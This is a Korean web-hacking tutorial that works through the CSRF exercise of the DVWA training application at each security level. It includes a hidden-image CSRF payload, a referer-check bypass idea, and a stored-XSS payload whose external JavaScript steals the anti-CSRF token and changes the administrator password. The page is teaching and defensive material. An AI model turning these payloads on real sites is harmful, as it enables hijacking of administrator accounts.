홈페이지 취약점 분석 이야기 파일 지도 사진 깨알






>> 목록보이기
#DVWA CSRF high level #DVWA #Damn Vulnerable Web Application #웹해킹 실습 #실습설명서 #취약점해설 #CSRF #Cross-site Request Forgery #XSRF #HTTP 연가시 #A8-Cross-Site Request Forgery (CSRF) #Anti-CSRF Token #AJAX #XMLHttpRequest #A3-Cross-Site Scripting (XSS) #저장형 XSS #크로스사이트스크립트 #HTML 삽입

DVWA-1.9: CSRF (HTTP 요청 대행 공격) 실습설명서

DVWA(Damn Vulnerable Web Application) 1.9 훈련장 라이브 ISO는 다음에서 다운로드 받을 수 있다.

DVWA 1.9 훈련장 라이브 ISO를 구동하는 방법은 다음 문서에서 볼 수 있다.

여기서는 구동 후 DVWA 훈련장의 주소가 http://192.168.206.136/이었다. DVWA 누리집의 로그인 정보는 admin/password이다. 실습을 진행하기 전에 다음 두 가지 사항을 작업을 사전에 수행하야야 한다.

  1. "DVWA Security" 항목에서 "Security Level"을 "Low"로 변경한다.
  2. "Setup / Reset DB" 항목에서 "Create / Reset Database"를 실행한다.

CSRF는 HTTP 요청을 심부름시키는 공격

CSRF는 Cross-site request forgery의 약자로 XSRF라고도 한다. 한글로는 주로 "사이트 간 요청 위조" 또는 "크로스 사이트 요청 위조" 등으로 번역하고 있다. 공격자가 정상 사용자에게 자신이 원하는 행위를 하도록 강제하는 공격이다. 물론 이 과정에서 정상 사용자는 이러한 공격이 발생했는 지를 알 수 없게 한다. CSRF 공격의 목적은 수정, 삭제, 등록, 권한상승, 정보유출 따위가 있다.

CSRF는 공격자가 권한이 없어서 원하는 HTTP 요청을 할 수 없기 때문에 권한이 있는 사용자에게 HTTP 요청을 대신 수행하도록 한다. 때문에 CSRF를 한글로 번역한다면 "HTTP요청 대행 공격"이나 "HTTP요청 심부름" 정도가 적당할 것 같다.

CSRF는 공격자가 웹 어플리케이션의 기능을 미리 알고 있어야 공격이 가능하다. 상위 권한의 사용자를 대상으로 CSRF 공격을 하기 위해서는 상위 권한의 기능을 알고 있어야 한다. 일반적으로 관리자 기능을 대상으로 CSRF 공격을 하게 되는 데 관리자 기능을 미리 알지 못하면 공격이 불가능하다. 따라서 CSRF 공격이 가능한 경우는 관리기능을 미리 알 수 있는 공개용 CMS가 대표적이다.

또 다른 사례로는 권한이 동등한 사용자 간의 공격을 들 수 있다. 예를 들어 메일서비스에 CSRF 공격이 가능하면 다른 사용자의 메일을 지우거나 메일함의 내용을 열람해 볼 수 있는 공격을 수행할 수 있을 것이다.

Vulnerability: Cross Site Request Forgery (CSRF) 공략: Security Level = Low

DVWA의 CSRF 훈련장을 공개용 CMS의 관리기능이라고 가정하자. 공격자는 자신이 직접 설치한 공개용 CMS에서 취약점을 찾는다. 정상적으로 비밀번호를 변경해보자.

DVWA CSRF low level
[ DVWA CSRF (low level) 비밀번호 수정 결과 ]

위의 화면에서는 New Password를 "testlow"로 입력하여 비밀번호를 수정한다. 붉은 색으로 "Password Changed."라는 문자열이 출력된다. 여기서 웹브라우저가 웹서버로 보낸 HTTP요청은 다음과 같다.

GET http://192.168.206.136/vulnerabilities/csrf/?password_new=testlow&password_conf=testlow&Change=Change HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.206.136/vulnerabilities/csrf/
Cookie: PHPSESSID=gulk7ha641o55qk52os77asr42; security=low
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Host: 192.168.206.136

비밀번호 변경 기능에서 사용하는 URL 변수는 password_newpassword_conf임을 알 수 있다. 다른 사이트에 대해서 이 공격이 성공하기 위해서는 관리자의 세션 쿠키를 알아야 한다 (위의 붉은색 부분 참조). 하지만 - XSS 취약점이 없다면 - 관리자의 세션키를 알기는 매우 어렵다. 이 때문에 공격자는 - 관리자 권한의 세션키로 이미 접속하고 있는 - 관리자에게 대신 비밀번호 변경 요청을 하도록 유도한다.

홈페이지 관리자에게 보낼 HTML은 다음과 같다.

<img src="http://192.168.206.136/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change">

공격자들이 가장 손쉽게 활용할 수 있는 방법이 메일이므로 메일의 내용에 위의 HTML을 포함하여 관리자에게 보낸다. 여기서는 응원의 말을 보내는 것으로 하였다.

DVWA CSRF low level 공격 메일
[ CSRF 공격 메일 ]

[이제 피해자의 입장이 되어보자!]

공격자로서의 흔적을 모두 지우기 위해서는 다음과 같은 과정을 거쳐야 한다.

  1. 먼저 Firefox의 모든 창을 닫는다. 세션키를 비롯한 쿠키가 없어진다.
  2. Firefox를 재실행하여 DVWA 훈련장에 admin으로 로그인한다. 새로운 세션 키가 만들어진다.
  3. DVWA의 Security Level을 Low로 설정한다(왼쪽 메뉴의 DVWA Security 항목).
  4. 새로운 탭을 열어서 메일을 읽는다.

다음 그림은 공격자가 보낸 메일을 관리자가 읽은 모습이다.

DVWA CSRF low level 공격 메일 관리자 수신
[ CSRF 공격 메일을 수신하여 관리자가 읽음 ]

메일 내용에서 마지막에 깨진 이미지가 보일 것이다. 교육의 목적상 이미지가 출력되게 한 것이지만 실제 공격이라면 width=0height=0 속성을 이용하여 그림이 정상적이지 않음을 보이지 않게 할 수 있다. 이미지가 읽혀지는 HTTP 요청을 OWASP-ZAP과 같은 HTTP 프록시를 이용하여 확인하면 다음과 같다.

GET http://192.168.206.136/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Cookie: PHPSESSID=mrjnmpfd2qna82bdqs36dqg823; security=low
Connection: keep-alive
Host: 192.168.206.136

붉은색으로 표시된 관리자 세션키를 이용하여 비밀번호 변경 요청이 되는 것을 알 수 있다.

[다시 공격자의 입장으로 돌아가보자!]

공격자는 메일의 "수신확인"과 같은 기능을 이용하여 관리자가 메일을 읽기를 기다린다. 피해자가 메일을 읽은 것을 확인하면 - DVWA 훈련장에 로그인한 적이 없는 크롬같은 웹브라우저로 - admin:1234로 로그인에 성공할 수 있을 것이다.

Vulnerability: Cross Site Request Forgery (CSRF) 공략: Security Level = Middle

Security Middle인 경우의 CSRF 문제에서는 약간의 방어책을 마련하였다. PHP 소스를 살펴보자.

    // Checks to see where the request came from
    if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

요청한 URL이 시작된 지점($_SERVER[ 'HTTP_REFERER' ])의 문자열에 웹서버의 도메인 주소($_SERVER[ 'SERVER_NAME' ])가 포함되어 있는 지를 대소문자 구분없이 검사(eregi())하고 있다. 이 방법은 실제 서비스에서도 종종 사용되는 데 사용되고 있다는 것을 알기만 하면 쉽게 우회가 가능한 단점이 있다.

첫번째 방법은 $_SERVER[ 'SERVER_NAME' ]가 포함된 파일이름을 만들면 된다. 이 설명서에서 $_SERVER[ 'SERVER_NAME' ]의 값은 192.168.206.136이다. "http://h4ck3r.site/192.168.206.136.html"과 같은 파일에 공격코드를 넣어서 관리자가 접근하게 유도하면 CSRF를 성공시킬 수 있다.

두번째 방법은 대상 홈페이지에 존재하는 XSS 취약점을 이용하는 것이다. 이 경우에는 공격 출발지가 대상 홈페이지 내에 있으므로 Medium 수준의 방어기작이 자동으로 우회된다. Security Level = High에서 저장형 XSS 취약점을 이용하여 공격하는 방법이 있으니 참조하기 바란다. 어떤 방법을 쓰던 <img src="/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change">를 관리자가 실행하도록 유도하면 된다.

자세한 공격 방법은 생략한다.

Vulnerability: Cross Site Request Forgery (CSRF) 공략: Security Level = High

다음은 Security Level = High에서의 CSRF 요청 URL이다.

http://192.168.206.136/vulnerabilities/csrf/?password_new=testhigh&password_conf=testhigh&Change=Change&user_token=ea107cddf30ce86b305318ca699457d0

기존 비밀번호를 몰라도 비밀번호를 변경할 수 있다. 그런데 user_token이라는 새로운 변수를 사용하고 있다. 이 변수는 접속시마다 새로 생성되는 토큰으로 접속자가 아니면 알기가 어렵다(접속자는 알 수 있다). 이러한 변수를 Anti-CSRF Token이라고 한다.

[공격자의 입장에서 취약점 찾기!]

Anti-CSRF Token을 접속자는 알 수 있다는 점이 Security Level = High 수준의 CSRF 공격에 대한 단서가 된다. 공격자는 알 수 없지만 정상적인 사용자에게 비밀번호 변경을 요청하도록 만들 때 user_token을 공격 URL에 추가해주면 된다. 이때 AJAX가 필요하다. user_token은 접속때마다 생성되어 서버의 세션에 저장되므로 AJAX를 이용하여 이 값을 알아낼 수 있다. 원하는 AJAX를 실행하기 위해서는 자바스크립트를 실행해야 하므로 공격자는 홈페이지를 뒤져서 XSS 취약점을 찾아낸다. DVWA에서 제공하는 저장형 XSS 실습문제를 이용해 보자.

DVWA Stored XSS low level
[ DVWA Stored XSS (low level)에서 방명록에 HTML 입력 ]

일단 공격자가 일반 사용자라고 가정한다. 편의를 위하여 DVWA Stored XSS 실습문제가 Low 수준에서 등록하였다. 위 그림에서는 방명록의 길이(maxlength=500)를 조작하여 HTML을 삽입하였다. 삽입한 방명록의 본문은 다음과 같다.

<span id="ajaxButton" style="cursor: pointer; text-decoration: underline">
  Click to change your password!
<span>
<script src="http://webhack.dynu.net/solutions/dvwa-csrf-high.js"></script>
Have a nice day!

idajaxButton<span> 엘리먼트를 방명록에 넣는다. 외부 서버에 저장된 파일(http://webhack.dynu.net/solutions/dvwa-csrf-high.js)에 <span>을 처리하는 자바스크립트가 포함되어 있다. 이 자바스크립트를 실행하면 실행하는 사람의 권한으로 비밀번호 변경을 시도한다.

<!--
(function() {
  var httpRequest;
  document.getElementById("ajaxButton").onclick = function() { makeRequest('/vulnerabilities/csrf/'); };

  function makeRequest(url) {
    if (window.XMLHttpRequest) { // Mozilla, Safari, ...
      httpRequest = new XMLHttpRequest();
    } else if (window.ActiveXObject) { // IE
      try {
        httpRequest = new ActiveXObject("Msxml2.XMLHTTP");
      } 
      catch (e) {
        try {
          httpRequest = new ActiveXObject("Microsoft.XMLHTTP");
        } 
        catch (e) {}
      }
    }

    if (!httpRequest) {
      alert('Giving up :( Cannot create an XMLHTTP instance');
      return false;
    }
    httpRequest.onreadystatechange = alertContents;
    httpRequest.open('GET', url);
    httpRequest.send();
  }

  function alertContents() {
    if (httpRequest.readyState === 4) {
      if (httpRequest.status === 200) {
        var htmlText = httpRequest.responseText;
//        alert(htmlText);
        var parser=new DOMParser();
        var xmlDoc = parser.parseFromString(htmlText,'text/html'); // 'text/xml' does not work
        var user_token = xmlDoc.getElementsByName("user_token")[0].value;
//        alert(user_token);
        document.location = '/vulnerabilities/csrf/?password_new=test1234&password_conf=test1234&Change=Change&user_token='+user_token;
      } else {
        alert('There was a problem with the request.');
      }
    }
  }
})();
-->

위의 자바스크립트는 XMLHttpRequest/vulnerabilities/csrf/를 읽어들인 후 user_token을 추출하여 덧붙인 후에 비밀번호 변경 URL로 강제 이동하도록 작성하였다. 여기서 사용한 공격용 자바스크립트(http://webhack.dynu.net/solutions/dvwa-csrf-high.js)https://developer.mozilla.org/ko/docs/AJAX/Getting_Started의 "3단계 - 간단한 예제"를 참조하여 만들었다.

이제 공격자는 피해자가 이 방명록을 접근하여 방명록에 보이는 링크를 클릭하기를 기다린다. 실제 공격이라면 피해자가 CSRF 공격 링크를 눌렀는 지 알 수 있도록 자바스크립트를 보다 정교하게 작성할 것이다.

[피해자의 입장!!!]

모든 웹 브라우저를 닫았다가 다시 실행한다. 이제 피해자의 입장에서 DVWA 훈련장의 admin으로 로그인하자.

DVWA Stored XSS low level
[ DVWA 방명록에 공격자가 등록한 게시물 ]

관리자는 새로운 방명록이 등록되었으므로 이를 확인할 것이다(위 그림). 실제라면 그럴 일이 없겠지만 관리자가 "Click to change your password!" 링크를 눌렀다고 가정하자.

DVWA CSRF high level exploit!
[ DVWA CSRF (high level)을 XSS를 이용하여 성공한 모습 ]

dvwa-csrf-high.js의 자바스크립트는 피해자의 비밀번호를 "test1234"로 변경하였다.

공격자는 피해자가 방명록(Guestbook)에 삽입한 링크를 눌렀다는 사실을 알게 되면 "admin:test1234"로 로그인에 성공할 것이다. 이제 공격자는 해당 홈페이지의 관리자 권한을 탈취하게 되었으므로 추가 공격을 이어갈 것이다.

Anti-CSRF Token의 경우에는 노출이 가능한 값이므로 이것만으로는 완벽한 방어가 어렵다는 것을 이 실습문제에서 알 수 있다. 따라서 회원정보와 같이 중요한 데이터를 변경할 때는 반드시 기존 비밀번호를 확인하여야 한다.

Vulnerability: Cross Site Request Forgery (CSRF) 공략: Security Level = Impossible

Security Level = Impossible에서는 기존 비밀번호를 입력하여야만 비밀번호 수정이 가능하다. 비밀번호 등과 같이 회원 정보를 수정할 때는 반드시 이와 같은 장치를 마련하여야 안전하다.

http://192.168.206.136/vulnerabilities/csrf/?password_current=testhigh&password_new=password&password_conf=password&Change=Change&user_token=740053672691227e68077179cf79d586

CSRF 공격을 막기위한 user_token과 현재 비밀번호까지 알아야 하므로 CSRF 공격은 불가능하다.

[처음 작성한 날: 2016.12.08]    [마지막으로 고친 날: 2017.07.13] 


< 이전 글 : DVWA Command Injection 실습 설명서 (2016.12.07)

> 다음 글 : DVWA File Inclusion 실습 설명서 (2016.12.15)


크리에이티브 커먼즈 라이선스 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문
 __
/ C는 유별나고 결함이 있으며 엄청나게  \
| 성공했다.  |
|  |
| - 데니스 맥칼리스터 리치, C 프로그래밍  |
\ 언어 개발자  /
 --
   \
    \
    ____  
   /# /_\_
  |  |/o\o\
  |  \\_/_/
 / |_   |  
|  ||\_ ~| 
|  ||| \/  
|  |||_    
 \//  |    
  ||  |    
  ||_  \   
  \_|  o|  
  /\___/   
 /  ||||__ 
    (___)_)
.. -- -- | - .. .... | ... / .. .../ ... {] . .. .. .. ..| ...... .../ .../ .. ...... ... ... ] .. [ .../ ..../ ......./ .. ./// ../ ... .. ... .. -- -- | - .. .... | ... / .. .../ ... {] . .. .. .. ..| ...... .../ .../ .. ./// ../ ... .. ... ...| ..../ ./ ... / ..| ....| ........ / ... / .... ...... ... ... ] .. [ .../ ..../ ......./ .....| ..../ ./ ... / ..| ....| ........ / ... / .... ...| ..../ ./ ... / ..| ....| ........ / ... / .... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .